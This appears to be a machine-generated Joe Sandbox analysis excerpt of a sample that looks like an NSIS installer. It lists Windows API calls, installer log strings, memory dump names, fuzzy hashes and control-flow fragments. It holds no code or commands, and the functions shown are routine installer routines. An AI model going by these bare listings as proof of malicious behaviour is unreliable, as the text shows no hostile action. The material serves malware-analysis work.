                                                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
• CreateDirectory: "%s" (%d), xrefs: 004017BF
• Call: %d, xrefs: 0040165A
• detailprint: %s, xrefs: 00401679
• CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
• Rename on reboot: %s, xrefs: 00401943
• IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
• SetFileAttributes failed., xrefs: 004017A1
• Jump: %d, xrefs: 00401602
Memory Dump Source
• Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
Similarity
• API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
• String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
• API String ID: 2872004960-3619442763
• Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
• Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
• Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
• Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Control-flow Graph (first block 4054a5-4054b7; legend: Executed / Not Executed; graph not reproduced)
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
• ShowWindow.USER32(?), ref: 004054FE
• DestroyWindow.USER32 ref: 00405512
• SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
• GetDlgItem.USER32(?,?), ref: 0040554F
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
• IsWindowEnabled.USER32(00000000), ref: 0040556A
• GetDlgItem.USER32(?,00000001), ref: 00405619
• GetDlgItem.USER32(?,00000002), ref: 00405623
• SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
• GetDlgItem.USER32(?,00000003), ref: 00405734
• ShowWindow.USER32(00000000,?), ref: 00405756
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
• EnableWindow.USER32(?,?), ref: 00405783
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
• EnableMenuItem.USER32(00000000), ref: 004057A0
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
• lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
• SetWindowTextW.USER32(?,00451D98), ref: 00405808
• ShowWindow.USER32(?,0000000A), ref: 0040593C
Memory Dump Source
• Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 3282139019-0
• Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
• Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
• Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
• Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Control-flow Graph (first block 405958-405970; legend: Executed / Not Executed; graph not reproduced)
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00405A7A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$: Completed$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                                            • API String ID: 608394941-4268185132
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,ReturningPreferencesWrightWhy,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,ReturningPreferencesWrightWhy,ReturningPreferencesWrightWhy,00000000,00000000,ReturningPreferencesWrightWhy,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ReturningPreferencesWrightWhy
                                                                                                                                                                                                                                                                                                                            • API String ID: 4286501637-2978164705
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                                            • API String ID: 4283519449-527102705

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00425D19,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: (]C$... %d%%$pAB
                                                                                                                                                                                                                                                                                                                            • API String ID: 651206458-3635341587

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(0065C410), ref: 00402387
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$ReturningPreferencesWrightWhy
                                                                                                                                                                                                                                                                                                                            • API String ID: 1459762280-616307493
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(0065C410), ref: 00402387
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0

